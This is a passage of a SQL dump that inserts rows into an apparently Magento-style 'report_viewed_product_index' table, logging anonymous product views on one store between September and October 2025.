(20064, NULL, NULL, 2054, 1, '2025-09-20 01:50:19'),
(20065, NULL, NULL, 2054, 1, '2025-09-20 01:50:23'),
(20066, NULL, NULL, 2064, 1, '2025-09-20 04:42:33'),
(20067, NULL, NULL, 2061, 1, '2025-09-20 05:41:37'),
(20068, NULL, NULL, 2060, 1, '2025-09-20 06:36:40'),
(20069, NULL, NULL, 2061, 1, '2025-09-20 07:44:47'),
(20070, NULL, NULL, 2060, 1, '2025-09-20 08:09:03'),
(20071, NULL, NULL, 2063, 1, '2025-09-20 13:55:17'),
(20072, NULL, NULL, 2064, 1, '2025-09-20 14:00:52'),
(20073, NULL, NULL, 2063, 1, '2025-09-20 14:47:17'),
(20074, NULL, NULL, 2062, 1, '2025-09-20 14:47:20'),
(20075, NULL, NULL, 2062, 1, '2025-09-20 15:30:00'),
(20076, NULL, NULL, 2060, 1, '2025-09-20 15:47:32'),
(20077, NULL, NULL, 2059, 1, '2025-09-20 15:47:35'),
(20078, NULL, NULL, 2060, 1, '2025-09-20 16:18:06'),
(20079, NULL, NULL, 2063, 1, '2025-09-20 16:24:30'),
(20080, NULL, NULL, 2060, 1, '2025-09-20 16:59:19'),
(20081, NULL, NULL, 2063, 1, '2025-09-20 17:12:07'),
(20082, NULL, NULL, 2053, 1, '2025-09-20 17:23:59'),
(20083, NULL, NULL, 2061, 1, '2025-09-20 17:24:02'),
(20084, NULL, NULL, 2058, 1, '2025-09-20 17:44:59'),
(20085, NULL, NULL, 2058, 1, '2025-09-20 18:22:51'),
(20086, NULL, NULL, 2059, 1, '2025-09-20 18:23:50'),
(20087, NULL, NULL, 2055, 1, '2025-09-20 18:46:23'),
(20088, NULL, NULL, 2059, 1, '2025-09-20 20:16:53'),
(20089, NULL, NULL, 2058, 1, '2025-09-20 20:16:55'),
(20090, NULL, NULL, 2061, 1, '2025-09-20 20:20:54'),
(20091, NULL, NULL, 2062, 1, '2025-09-20 21:12:57'),
(20092, NULL, NULL, 2054, 1, '2025-09-20 22:56:06'),
(20093, NULL, NULL, 2059, 1, '2025-09-20 23:17:36'),
(20094, NULL, NULL, 2064, 1, '2025-09-20 23:35:23'),
(20095, NULL, NULL, 2061, 1, '2025-09-20 23:50:11'),
(20096, NULL, NULL, 2064, 1, '2025-09-21 00:12:24'),
(20097, NULL, NULL, 2060, 1, '2025-09-21 00:43:22'),
(20098, NULL, NULL, 2064, 1, '2025-09-21 01:32:27'),
(20099, NULL, NULL, 2062, 1, '2025-09-21 02:28:08'),
(20100, NULL, NULL, 2064, 1, '2025-09-21 03:12:12'),
(20101, NULL, NULL, 2063, 1, '2025-09-21 03:18:42'),
(20102, NULL, NULL, 2061, 1, '2025-09-21 03:58:36'),
(20103, NULL, NULL, 2055, 1, '2025-09-21 04:08:17'),
(20104, NULL, NULL, 2064, 1, '2025-09-21 04:41:27'),
(20105, NULL, NULL, 2060, 1, '2025-09-21 06:54:16'),
(20106, NULL, NULL, 2059, 1, '2025-09-21 06:54:18'),
(20107, NULL, NULL, 2060, 1, '2025-09-21 06:55:19'),
(20108, NULL, NULL, 2061, 1, '2025-09-21 07:27:44'),
(20109, NULL, NULL, 2060, 1, '2025-09-21 08:48:55'),
(20110, NULL, NULL, 2054, 1, '2025-09-21 09:19:33'),
(20111, NULL, NULL, 2060, 1, '2025-09-21 09:48:25'),
(20112, NULL, NULL, 2058, 1, '2025-09-21 09:59:06'),
(20113, NULL, NULL, 2054, 1, '2025-09-21 10:18:54'),
(20114, NULL, NULL, 2055, 1, '2025-09-21 11:49:02'),
(20115, NULL, NULL, 2062, 1, '2025-09-21 15:20:23'),
(20116, NULL, NULL, 2058, 1, '2025-09-21 16:05:56'),
(20117, NULL, NULL, 2064, 1, '2025-09-21 16:20:30'),
(20118, NULL, NULL, 2064, 1, '2025-09-21 19:50:20'),
(20119, NULL, NULL, 2058, 1, '2025-09-21 19:58:24'),
(20120, NULL, NULL, 2061, 1, '2025-09-21 20:07:36'),
(20121, NULL, NULL, 2064, 1, '2025-09-21 20:14:56'),
(20122, NULL, NULL, 2059, 1, '2025-09-21 20:22:35'),
(20123, NULL, NULL, 2061, 1, '2025-09-21 21:04:20'),
(20124, NULL, NULL, 2059, 1, '2025-09-21 21:18:25'),
(20125, NULL, NULL, 2061, 1, '2025-09-21 22:18:45'),
(20126, NULL, NULL, 2060, 1, '2025-09-21 22:22:58'),
(20127, NULL, NULL, 2054, 1, '2025-09-21 22:25:11'),
(20128, NULL, NULL, 2061, 1, '2025-09-21 22:56:06'),
(20129, NULL, NULL, 2061, 1, '2025-09-21 22:57:02'),
(20130, NULL, NULL, 2064, 1, '2025-09-22 00:26:51'),
(20131, NULL, NULL, 2061, 1, '2025-09-22 00:33:34'),
(20132, NULL, NULL, 2062, 1, '2025-09-22 00:58:58'),
(20133, NULL, NULL, 2064, 1, '2025-09-22 02:57:11'),
(20134, NULL, NULL, 2060, 1, '2025-09-22 03:18:46'),
(20135, NULL, NULL, 2055, 1, '2025-09-22 07:43:19'),
(20136, NULL, NULL, 2054, 1, '2025-09-22 08:17:11'),
(20137, NULL, NULL, 2062, 1, '2025-09-22 08:48:11'),
(20138, NULL, NULL, 2061, 1, '2025-09-22 08:50:11'),
(20139, NULL, NULL, 2064, 1, '2025-09-22 09:13:48'),
(20140, NULL, NULL, 2064, 1, '2025-09-22 09:13:50'),
(20141, NULL, NULL, 2063, 1, '2025-09-22 12:16:15'),
(20142, NULL, NULL, 2055, 1, '2025-09-22 12:33:35'),
(20143, NULL, NULL, 2064, 1, '2025-09-22 13:59:02'),
(20144, NULL, NULL, 2062, 1, '2025-09-22 15:19:45'),
(20145, NULL, NULL, 2064, 1, '2025-09-22 15:20:48'),
(20146, NULL, NULL, 2064, 1, '2025-09-22 16:50:29'),
(20147, NULL, NULL, 2058, 1, '2025-09-22 17:34:58'),
(20148, NULL, NULL, 2060, 1, '2025-09-22 17:59:58'),
(20149, NULL, NULL, 2061, 1, '2025-09-22 18:41:32'),
(20150, NULL, NULL, 2063, 1, '2025-09-22 19:03:20'),
(20151, NULL, NULL, 2059, 1, '2025-09-22 20:21:33'),
(20152, NULL, NULL, 2059, 1, '2025-09-22 20:33:39'),
(20153, NULL, NULL, 2061, 1, '2025-09-23 01:14:37'),
(20154, NULL, NULL, 2060, 1, '2025-09-23 01:51:43'),
(20155, NULL, NULL, 2061, 1, '2025-09-23 03:13:17'),
(20156, NULL, NULL, 2064, 1, '2025-09-23 04:25:28'),
(20157, NULL, NULL, 2061, 1, '2025-09-23 07:33:40'),
(20158, NULL, NULL, 2061, 1, '2025-09-23 09:26:20'),
(20159, NULL, NULL, 2054, 1, '2025-09-23 09:26:28'),
(20160, NULL, NULL, 2060, 1, '2025-09-23 09:38:25'),
(20161, NULL, NULL, 2064, 1, '2025-09-23 14:13:02'),
(20162, NULL, NULL, 2063, 1, '2025-09-23 15:26:03'),
(20163, NULL, NULL, 2063, 1, '2025-09-23 15:26:30'),
(20164, NULL, NULL, 2063, 1, '2025-09-23 15:26:36'),
(20165, NULL, NULL, 2063, 1, '2025-09-23 15:26:46'),
(20166, NULL, NULL, 2063, 1, '2025-09-23 15:26:55'),
(20167, NULL, NULL, 2063, 1, '2025-09-23 15:27:18'),
(20168, NULL, NULL, 2063, 1, '2025-09-23 15:27:39'),
(20169, NULL, NULL, 2063, 1, '2025-09-23 15:27:54'),
(20170, NULL, NULL, 2063, 1, '2025-09-23 15:28:10'),
(20171, NULL, NULL, 2063, 1, '2025-09-23 15:28:16'),
(20172, NULL, NULL, 2063, 1, '2025-09-23 15:28:19'),
(20173, NULL, NULL, 2063, 1, '2025-09-23 15:30:47'),
(20174, NULL, NULL, 2063, 1, '2025-09-23 15:41:25'),
(20175, NULL, NULL, 2063, 1, '2025-09-23 15:41:25'),
(20176, NULL, NULL, 2063, 1, '2025-09-23 15:41:26'),
(20177, NULL, NULL, 2063, 1, '2025-09-23 15:41:26'),
(20178, NULL, NULL, 2063, 1, '2025-09-23 15:53:36'),
(20179, NULL, NULL, 2063, 1, '2025-09-23 15:53:44'),
(20180, NULL, NULL, 2058, 1, '2025-09-23 20:00:59'),
(20181, NULL, NULL, 2054, 1, '2025-09-23 20:01:04'),
(20182, NULL, NULL, 2062, 1, '2025-09-23 20:55:51'),
(20183, NULL, NULL, 2060, 1, '2025-09-23 22:28:01'),
(20184, NULL, NULL, 2058, 1, '2025-09-23 23:56:08'),
(20185, NULL, NULL, 2064, 1, '2025-09-24 00:20:24'),
(20186, NULL, NULL, 2061, 1, '2025-09-24 00:35:23'),
(20187, NULL, NULL, 2060, 1, '2025-09-24 01:40:04'),
(20188, NULL, NULL, 2064, 1, '2025-09-24 04:06:53'),
(20189, NULL, NULL, 2061, 1, '2025-09-24 04:42:01'),
(20190, NULL, NULL, 2063, 1, '2025-09-24 05:06:44'),
(20191, NULL, NULL, 2058, 1, '2025-09-24 07:04:54'),
(20192, NULL, NULL, 2060, 1, '2025-09-24 07:22:46'),
(20193, NULL, NULL, 2064, 1, '2025-09-24 07:22:52'),
(20194, NULL, NULL, 2060, 1, '2025-09-24 13:35:53'),
(20195, NULL, NULL, 2062, 1, '2025-09-24 16:06:16'),
(20196, NULL, NULL, 2064, 1, '2025-09-24 19:31:44'),
(20197, NULL, NULL, 2064, 1, '2025-09-24 20:03:58'),
(20198, NULL, NULL, 2061, 1, '2025-09-24 20:19:12'),
(20199, NULL, NULL, 2061, 1, '2025-09-24 21:54:59'),
(20200, NULL, NULL, 2055, 1, '2025-09-25 00:16:19'),
(20201, NULL, NULL, 2059, 1, '2025-09-25 00:31:51'),
(20202, NULL, NULL, 2058, 1, '2025-09-25 03:23:11'),
(20203, NULL, NULL, 2064, 1, '2025-09-25 05:50:58'),
(20204, NULL, NULL, 2064, 1, '2025-09-25 06:05:45'),
(20205, NULL, NULL, 2060, 1, '2025-09-25 06:25:21'),
(20206, NULL, NULL, 2061, 1, '2025-09-25 06:42:57'),
(20207, NULL, NULL, 2053, 1, '2025-09-25 06:52:49'),
(20208, NULL, NULL, 2055, 1, '2025-09-25 07:35:01'),
(20209, NULL, NULL, 2060, 1, '2025-09-25 08:23:01'),
(20210, NULL, NULL, 2063, 1, '2025-09-25 08:23:12'),
(20211, NULL, NULL, 2061, 1, '2025-09-25 09:10:31'),
(20212, NULL, NULL, 2060, 1, '2025-09-25 13:32:27'),
(20213, NULL, NULL, 2064, 1, '2025-09-25 13:35:57'),
(20214, NULL, NULL, 2059, 1, '2025-09-25 17:44:29'),
(20215, NULL, NULL, 2059, 1, '2025-09-25 19:08:22'),
(20216, NULL, NULL, 2058, 1, '2025-09-25 19:47:36'),
(20217, NULL, NULL, 2061, 1, '2025-09-25 20:27:48'),
(20218, NULL, NULL, 2055, 1, '2025-09-25 20:37:06'),
(20219, NULL, NULL, 2054, 1, '2025-09-25 20:45:15'),
(20220, NULL, NULL, 2054, 1, '2025-09-25 21:12:13'),
(20221, NULL, NULL, 2058, 1, '2025-09-25 22:13:39'),
(20222, NULL, NULL, 2062, 1, '2025-09-25 22:33:16'),
(20223, NULL, NULL, 2060, 1, '2025-09-25 23:12:11'),
(20224, NULL, NULL, 2064, 1, '2025-09-25 23:57:46'),
(20225, NULL, NULL, 2061, 1, '2025-09-25 23:58:38'),
(20226, NULL, NULL, 2062, 1, '2025-09-26 00:50:45'),
(20227, NULL, NULL, 2053, 1, '2025-09-26 01:53:47'),
(20228, NULL, NULL, 2064, 1, '2025-09-26 03:13:55'),
(20229, NULL, NULL, 2063, 1, '2025-09-26 03:22:42'),
(20230, NULL, NULL, 2060, 1, '2025-09-26 03:44:12'),
(20231, NULL, NULL, 2063, 1, '2025-09-26 04:23:47'),
(20232, NULL, NULL, 2060, 1, '2025-09-26 04:43:17'),
(20233, NULL, NULL, 2062, 1, '2025-09-26 09:28:07'),
(20234, NULL, NULL, 2064, 1, '2025-09-26 10:18:58'),
(20235, NULL, NULL, 2063, 1, '2025-09-26 11:39:27'),
(20236, NULL, NULL, 2061, 1, '2025-09-26 12:00:50'),
(20237, NULL, NULL, 2060, 1, '2025-09-26 12:55:20'),
(20238, NULL, NULL, 2064, 1, '2025-09-26 13:22:24'),
(20239, NULL, NULL, 2060, 1, '2025-09-26 13:30:33'),
(20240, NULL, NULL, 2060, 1, '2025-09-26 13:56:11'),
(20241, NULL, NULL, 2062, 1, '2025-09-26 14:36:46'),
(20242, NULL, NULL, 2058, 1, '2025-09-26 16:29:02'),
(20243, NULL, NULL, 2063, 1, '2025-09-26 17:00:02'),
(20244, NULL, NULL, 2060, 1, '2025-09-26 20:41:26'),
(20245, NULL, NULL, 2061, 1, '2025-09-26 21:17:45'),
(20246, NULL, NULL, 2058, 1, '2025-09-26 21:34:19'),
(20247, NULL, NULL, 2063, 1, '2025-09-26 22:45:52'),
(20248, NULL, NULL, 2061, 1, '2025-09-26 22:45:57'),
(20249, NULL, NULL, 2062, 1, '2025-09-26 22:46:01'),
(20250, NULL, NULL, 2058, 1, '2025-09-26 22:54:40'),
(20251, NULL, NULL, 2061, 1, '2025-09-27 01:23:17'),
(20252, NULL, NULL, 2064, 1, '2025-09-27 01:42:56'),
(20253, NULL, NULL, 2058, 1, '2025-09-27 03:44:02'),
(20254, NULL, NULL, 2064, 1, '2025-09-27 03:53:22'),
(20255, NULL, NULL, 2059, 1, '2025-09-27 04:04:34'),
(20256, NULL, NULL, 2054, 1, '2025-09-27 05:07:29'),
(20257, NULL, NULL, 2064, 1, '2025-09-27 13:25:12'),
(20258, NULL, NULL, 2063, 1, '2025-09-27 13:37:50'),
(20259, NULL, NULL, 2062, 1, '2025-09-27 14:08:00'),
(20260, NULL, NULL, 2054, 1, '2025-09-27 14:17:23'),
(20261, NULL, NULL, 2060, 1, '2025-09-27 14:29:03'),
(20262, NULL, NULL, 2063, 1, '2025-09-27 14:37:23'),
(20263, NULL, NULL, 2061, 1, '2025-09-27 14:48:14'),
(20264, NULL, NULL, 2064, 1, '2025-09-27 14:58:53'),
(20265, NULL, NULL, 2062, 1, '2025-09-27 16:04:17'),
(20266, NULL, NULL, 2055, 1, '2025-09-27 18:14:08'),
(20267, NULL, NULL, 2054, 1, '2025-09-27 21:49:53'),
(20268, NULL, NULL, 2060, 1, '2025-09-27 22:03:37'),
(20269, NULL, NULL, 2061, 1, '2025-09-27 22:14:03'),
(20270, NULL, NULL, 2061, 1, '2025-09-27 23:34:31'),
(20271, NULL, NULL, 2061, 1, '2025-09-27 23:44:33'),
(20272, NULL, NULL, 2060, 1, '2025-09-27 23:44:43'),
(20273, NULL, NULL, 2064, 1, '2025-09-27 23:44:49'),
(20274, NULL, NULL, 2062, 1, '2025-09-28 00:40:23'),
(20275, NULL, NULL, 2060, 1, '2025-09-28 03:27:39'),
(20276, NULL, NULL, 2064, 1, '2025-09-28 03:49:02'),
(20277, NULL, NULL, 2064, 1, '2025-09-28 03:50:21'),
(20278, NULL, NULL, 2058, 1, '2025-09-28 04:00:01'),
(20279, NULL, NULL, 2059, 1, '2025-09-28 05:07:09'),
(20280, NULL, NULL, 2060, 1, '2025-09-28 05:26:46'),
(20281, NULL, NULL, 2064, 1, '2025-09-28 05:33:39'),
(20282, NULL, NULL, 2064, 1, '2025-09-28 05:58:59'),
(20283, NULL, NULL, 2060, 1, '2025-09-28 07:09:59'),
(20284, NULL, NULL, 2060, 1, '2025-09-28 07:14:17'),
(20285, NULL, NULL, 2059, 1, '2025-09-28 07:14:21'),
(20286, NULL, NULL, 2059, 1, '2025-09-28 08:00:49'),
(20287, NULL, NULL, 2058, 1, '2025-09-28 08:52:32'),
(20288, NULL, NULL, 2055, 1, '2025-09-28 09:35:03'),
(20289, NULL, NULL, 2060, 1, '2025-09-28 10:33:47'),
(20290, NULL, NULL, 2064, 1, '2025-09-28 11:20:30'),
(20291, NULL, NULL, 2055, 1, '2025-09-28 11:42:48'),
(20292, NULL, NULL, 2061, 1, '2025-09-28 13:30:52'),
(20293, NULL, NULL, 2064, 1, '2025-09-28 13:47:25'),
(20294, 3712, NULL, 2064, 1, '2025-09-28 13:48:22'),
(20296, NULL, NULL, 2060, 1, '2025-09-28 15:27:41'),
(20297, NULL, NULL, 2053, 1, '2025-09-28 15:31:54'),
(20298, NULL, NULL, 2058, 1, '2025-09-28 15:34:55'),
(20299, NULL, NULL, 2054, 1, '2025-09-28 15:40:38'),
(20300, NULL, NULL, 2060, 1, '2025-09-28 15:40:43'),
(20301, NULL, NULL, 2060, 1, '2025-09-28 15:48:23'),
(20302, NULL, NULL, 2062, 1, '2025-09-28 15:58:29'),
(20303, NULL, NULL, 2054, 1, '2025-09-28 21:54:01'),
(20304, NULL, NULL, 2055, 1, '2025-09-28 21:54:49'),
(20305, NULL, NULL, 2059, 1, '2025-09-28 23:18:58'),
(20306, NULL, NULL, 2064, 1, '2025-09-28 23:24:00'),
(20307, NULL, NULL, 2054, 1, '2025-09-28 23:51:51'),
(20308, NULL, NULL, 2060, 1, '2025-09-29 00:55:23'),
(20309, NULL, NULL, 2061, 1, '2025-09-29 02:16:49'),
(20310, NULL, NULL, 2064, 1, '2025-09-29 03:05:43'),
(20311, NULL, NULL, 2055, 1, '2025-09-29 04:36:44'),
(20312, NULL, NULL, 2060, 1, '2025-09-29 05:49:06'),
(20313, NULL, NULL, 2061, 1, '2025-09-29 07:55:55'),
(20314, NULL, NULL, 2054, 1, '2025-09-29 08:52:58'),
(20315, NULL, NULL, 2064, 1, '2025-09-29 08:56:27'),
(20316, NULL, NULL, 2061, 1, '2025-09-29 09:02:25'),
(20317, NULL, NULL, 2061, 1, '2025-09-29 09:20:44'),
(20318, NULL, NULL, 2060, 1, '2025-09-29 10:02:22'),
(20319, NULL, NULL, 2055, 1, '2025-09-29 10:04:44'),
(20320, NULL, NULL, 2064, 1, '2025-09-29 11:10:01'),
(20321, NULL, NULL, 2058, 1, '2025-09-29 11:25:41'),
(20322, NULL, NULL, 2061, 1, '2025-09-29 11:58:03'),
(20323, NULL, NULL, 2064, 1, '2025-09-29 12:29:23'),
(20324, NULL, NULL, 2055, 1, '2025-09-29 12:31:10'),
(20325, NULL, NULL, 2059, 1, '2025-09-29 12:34:50'),
(20326, NULL, NULL, 2062, 1, '2025-09-29 13:37:42'),
(20327, NULL, NULL, 2060, 1, '2025-09-29 14:36:32'),
(20328, NULL, NULL, 2058, 1, '2025-09-29 15:35:32'),
(20329, NULL, NULL, 2062, 1, '2025-09-29 16:01:12'),
(20330, NULL, NULL, 2058, 1, '2025-09-29 16:59:15'),
(20331, NULL, NULL, 2063, 1, '2025-09-29 17:08:13'),
(20332, NULL, NULL, 2060, 1, '2025-09-29 17:41:51'),
(20333, NULL, NULL, 2064, 1, '2025-09-29 18:23:16'),
(20334, NULL, NULL, 2059, 1, '2025-09-29 18:25:29'),
(20335, NULL, NULL, 2060, 1, '2025-09-29 19:09:42'),
(20336, NULL, NULL, 2061, 1, '2025-09-29 21:18:29'),
(20337, NULL, NULL, 2063, 1, '2025-09-29 22:01:55'),
(20338, NULL, NULL, 2064, 1, '2025-09-29 22:18:50'),
(20339, NULL, NULL, 2061, 1, '2025-09-29 23:23:34'),
(20340, NULL, NULL, 2062, 1, '2025-09-29 23:34:33'),
(20341, NULL, NULL, 2063, 1, '2025-09-30 01:34:22'),
(20342, NULL, NULL, 2064, 1, '2025-09-30 02:21:21'),
(20343, NULL, NULL, 2054, 1, '2025-09-30 04:42:10'),
(20344, NULL, NULL, 2063, 1, '2025-09-30 05:16:47'),
(20345, NULL, NULL, 2053, 1, '2025-09-30 07:00:14'),
(20346, NULL, NULL, 2064, 1, '2025-09-30 07:44:10'),
(20347, NULL, NULL, 2064, 1, '2025-09-30 07:44:12'),
(20348, NULL, NULL, 2061, 1, '2025-09-30 09:31:17'),
(20349, NULL, NULL, 2064, 1, '2025-09-30 11:50:49'),
(20350, NULL, NULL, 2060, 1, '2025-09-30 12:05:45'),
(20351, NULL, NULL, 2061, 1, '2025-09-30 12:08:32'),
(20352, NULL, NULL, 2060, 1, '2025-09-30 12:18:40'),
(20353, NULL, NULL, 2064, 1, '2025-09-30 12:32:56'),
(20354, NULL, NULL, 2061, 1, '2025-09-30 12:47:33'),
(20355, NULL, NULL, 2061, 1, '2025-09-30 13:00:53'),
(20356, NULL, NULL, 2062, 1, '2025-09-30 13:03:32'),
(20357, NULL, NULL, 2053, 1, '2025-09-30 15:29:09'),
(20358, NULL, NULL, 2062, 1, '2025-09-30 15:45:28'),
(20359, NULL, NULL, 2060, 1, '2025-09-30 17:28:45'),
(20360, NULL, NULL, 2064, 1, '2025-09-30 17:59:09'),
(20361, NULL, NULL, 2063, 1, '2025-09-30 18:09:38'),
(20362, NULL, NULL, 2063, 1, '2025-09-30 19:07:58'),
(20363, NULL, NULL, 2061, 1, '2025-09-30 19:19:23'),
(20364, NULL, NULL, 2055, 1, '2025-09-30 19:29:04'),
(20365, NULL, NULL, 2054, 1, '2025-09-30 19:44:17'),
(20366, NULL, NULL, 2054, 1, '2025-09-30 19:52:52'),
(20367, NULL, NULL, 2058, 1, '2025-09-30 19:52:55'),
(20368, NULL, NULL, 2064, 1, '2025-09-30 23:22:16'),
(20369, NULL, NULL, 2059, 1, '2025-09-30 23:49:20'),
(20370, NULL, NULL, 2064, 1, '2025-10-01 00:06:23'),
(20371, NULL, NULL, 2060, 1, '2025-10-01 04:35:00'),
(20372, NULL, NULL, 2061, 1, '2025-10-01 05:57:06'),
(20373, NULL, NULL, 2064, 1, '2025-10-01 07:36:47'),
(20374, NULL, NULL, 2062, 1, '2025-10-01 07:46:53'),
(20375, NULL, NULL, 2060, 1, '2025-10-01 08:22:37'),
(20376, NULL, NULL, 2060, 1, '2025-10-01 12:07:42'),
(20377, NULL, NULL, 2058, 1, '2025-10-01 12:22:43'),
(20378, NULL, NULL, 2060, 1, '2025-10-01 13:17:19'),
(20379, NULL, NULL, 2060, 1, '2025-10-01 13:45:45'),
(20380, NULL, NULL, 2063, 1, '2025-10-01 15:08:45'),
(20381, NULL, NULL, 2062, 1, '2025-10-01 15:53:17'),
(20382, NULL, NULL, 2061, 1, '2025-10-01 17:33:36'),
(20383, NULL, NULL, 2054, 1, '2025-10-01 17:52:01'),
(20384, NULL, NULL, 2055, 1, '2025-10-01 17:57:00'),
(20385, NULL, NULL, 2064, 1, '2025-10-01 18:42:45'),
(20386, NULL, NULL, 2059, 1, '2025-10-01 18:53:05'),
(20387, NULL, NULL, 2058, 1, '2025-10-01 19:02:11'),
(20388, NULL, NULL, 2060, 1, '2025-10-01 19:15:26'),
(20389, NULL, NULL, 2064, 1, '2025-10-01 21:35:23'),
(20390, NULL, NULL, 2060, 1, '2025-10-01 21:54:44'),
(20391, NULL, NULL, 2060, 1, '2025-10-01 23:01:40'),
(20392, NULL, NULL, 2064, 1, '2025-10-02 00:53:55'),
(20393, NULL, NULL, 2064, 1, '2025-10-02 01:43:21'),
(20394, NULL, NULL, 2054, 1, '2025-10-02 03:33:12'),
(20395, NULL, NULL, 2059, 1, '2025-10-02 05:01:54'),
(20396, NULL, NULL, 2061, 1, '2025-10-02 05:31:49'),
(20397, NULL, NULL, 2064, 1, '2025-10-02 05:32:17'),
(20398, NULL, NULL, 2063, 1, '2025-10-02 05:32:19'),
(20399, NULL, NULL, 2059, 1, '2025-10-02 05:32:23'),
(20400, NULL, NULL, 2053, 1, '2025-10-02 05:32:24'),
(20401, NULL, NULL, 2058, 1, '2025-10-02 05:32:26'),
(20402, NULL, NULL, 2055, 1, '2025-10-02 05:32:28'),
(20403, NULL, NULL, 2062, 1, '2025-10-02 05:32:30'),
(20404, NULL, NULL, 2054, 1, '2025-10-02 05:32:32'),
(20405, NULL, NULL, 2060, 1, '2025-10-02 05:32:46'),
(20406, NULL, NULL, 2061, 1, '2025-10-02 11:40:12'),
(20407, NULL, NULL, 2060, 1, '2025-10-02 12:43:16'),
(20408, NULL, NULL, 2060, 1, '2025-10-02 13:35:22'),
(20409, NULL, NULL, 2054, 1, '2025-10-02 13:54:08'),
(20410, NULL, NULL, 2062, 1, '2025-10-02 16:42:59');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(20411, NULL, NULL, 2061, 1, '2025-10-02 17:42:39'),
(20412, NULL, NULL, 2059, 1, '2025-10-02 17:56:51'),
(20413, NULL, NULL, 2064, 1, '2025-10-02 19:32:50'),
(20414, NULL, NULL, 2064, 1, '2025-10-03 00:35:20'),
(20415, NULL, NULL, 2061, 1, '2025-10-03 00:37:44'),
(20416, NULL, NULL, 2062, 1, '2025-10-03 00:37:48'),
(20417, NULL, NULL, 2063, 1, '2025-10-03 00:37:52'),
(20418, NULL, NULL, 2053, 1, '2025-10-03 01:46:24'),
(20419, NULL, NULL, 2058, 1, '2025-10-03 03:37:44'),
(20420, NULL, NULL, 2054, 1, '2025-10-03 08:49:27'),
(20421, NULL, NULL, 2054, 1, '2025-10-03 10:40:07'),
(20422, NULL, NULL, 2060, 1, '2025-10-03 11:06:58'),
(20423, NULL, NULL, 2064, 1, '2025-10-03 11:42:43'),
(20424, NULL, NULL, 2064, 1, '2025-10-03 13:19:31'),
(20425, NULL, NULL, 2062, 1, '2025-10-03 13:19:37'),
(20426, NULL, NULL, 2063, 1, '2025-10-03 13:22:44'),
(20427, NULL, NULL, 2064, 1, '2025-10-03 15:55:50'),
(20428, NULL, NULL, 2062, 1, '2025-10-03 16:21:46'),
(20429, NULL, NULL, 2062, 1, '2025-10-03 17:36:30'),
(20430, NULL, NULL, 2060, 1, '2025-10-03 17:41:06'),
(20431, NULL, NULL, 2060, 1, '2025-10-03 22:41:18'),
(20432, NULL, NULL, 2063, 1, '2025-10-03 22:48:03'),
(20433, NULL, NULL, 2058, 1, '2025-10-03 23:03:52'),
(20434, NULL, NULL, 2055, 1, '2025-10-03 23:32:59'),
(20435, NULL, NULL, 2061, 1, '2025-10-04 00:22:53'),
(20436, NULL, NULL, 2062, 1, '2025-10-04 00:51:18'),
(20437, NULL, NULL, 2064, 1, '2025-10-04 01:07:42'),
(20438, NULL, NULL, 2064, 1, '2025-10-04 01:23:55'),
(20439, NULL, NULL, 2063, 1, '2025-10-04 01:25:25'),
(20440, NULL, NULL, 2054, 1, '2025-10-04 01:45:16'),
(20441, NULL, NULL, 2059, 1, '2025-10-04 01:56:56'),
(20442, NULL, NULL, 2064, 1, '2025-10-04 02:06:25'),
(20443, NULL, NULL, 2060, 1, '2025-10-04 02:51:41'),
(20444, NULL, NULL, 2058, 1, '2025-10-04 02:51:56'),
(20445, NULL, NULL, 2061, 1, '2025-10-04 03:01:33'),
(20446, NULL, NULL, 2062, 1, '2025-10-04 04:05:23'),
(20447, NULL, NULL, 2054, 1, '2025-10-04 05:04:51'),
(20448, NULL, NULL, 2054, 1, '2025-10-04 06:22:32'),
(20449, NULL, NULL, 2064, 1, '2025-10-04 06:23:26'),
(20450, NULL, NULL, 2060, 1, '2025-10-04 07:29:01'),
(20451, NULL, NULL, 2063, 1, '2025-10-04 07:35:08'),
(20452, NULL, NULL, 2058, 1, '2025-10-04 07:50:05'),
(20453, NULL, NULL, 2055, 1, '2025-10-04 08:15:21'),
(20454, NULL, NULL, 2061, 1, '2025-10-04 09:02:31'),
(20455, NULL, NULL, 2062, 1, '2025-10-04 09:29:39'),
(20456, NULL, NULL, 2055, 1, '2025-10-04 09:41:12'),
(20457, NULL, NULL, 2062, 1, '2025-10-04 10:01:00'),
(20458, NULL, NULL, 2053, 1, '2025-10-04 10:02:50'),
(20459, NULL, NULL, 2054, 1, '2025-10-04 10:03:18'),
(20460, NULL, NULL, 2055, 1, '2025-10-04 10:03:51'),
(20461, NULL, NULL, 2064, 1, '2025-10-04 10:05:50'),
(20462, NULL, NULL, 2063, 1, '2025-10-04 10:05:55'),
(20463, NULL, NULL, 2060, 1, '2025-10-04 10:06:09'),
(20464, NULL, NULL, 2059, 1, '2025-10-04 10:06:14'),
(20465, NULL, NULL, 2061, 1, '2025-10-04 10:06:19'),
(20466, NULL, NULL, 2058, 1, '2025-10-04 10:06:41'),
(20467, NULL, NULL, 2060, 1, '2025-10-04 10:07:51'),
(20468, NULL, NULL, 2054, 1, '2025-10-04 10:19:53'),
(20469, NULL, NULL, 2059, 1, '2025-10-04 10:31:00'),
(20470, NULL, NULL, 2058, 1, '2025-10-04 10:36:50'),
(20471, NULL, NULL, 2061, 1, '2025-10-04 10:36:59'),
(20472, NULL, NULL, 2064, 1, '2025-10-04 10:37:05'),
(20473, NULL, NULL, 2059, 1, '2025-10-04 10:37:10'),
(20474, NULL, NULL, 2060, 1, '2025-10-04 10:37:18'),
(20475, NULL, NULL, 2062, 1, '2025-10-04 10:37:27'),
(20476, NULL, NULL, 2063, 1, '2025-10-04 10:37:35'),
(20477, NULL, NULL, 2064, 1, '2025-10-04 10:37:43'),
(20478, NULL, NULL, 2055, 1, '2025-10-04 10:39:25'),
(20479, NULL, NULL, 2054, 1, '2025-10-04 10:39:36'),
(20480, NULL, NULL, 2053, 1, '2025-10-04 10:39:46'),
(20481, NULL, NULL, 2064, 1, '2025-10-04 10:39:53'),
(20482, NULL, NULL, 2060, 1, '2025-10-04 13:26:50'),
(20483, NULL, NULL, 2062, 1, '2025-10-04 16:19:36'),
(20484, NULL, NULL, 2058, 1, '2025-10-04 17:23:20'),
(20485, NULL, NULL, 2064, 1, '2025-10-04 17:45:38'),
(20486, NULL, NULL, 2061, 1, '2025-10-04 18:58:18'),
(20487, NULL, NULL, 2061, 1, '2025-10-04 21:06:21'),
(20488, NULL, NULL, 2059, 1, '2025-10-04 21:12:44'),
(20489, NULL, NULL, 2064, 1, '2025-10-04 23:53:50'),
(20490, NULL, NULL, 2054, 1, '2025-10-05 01:34:17'),
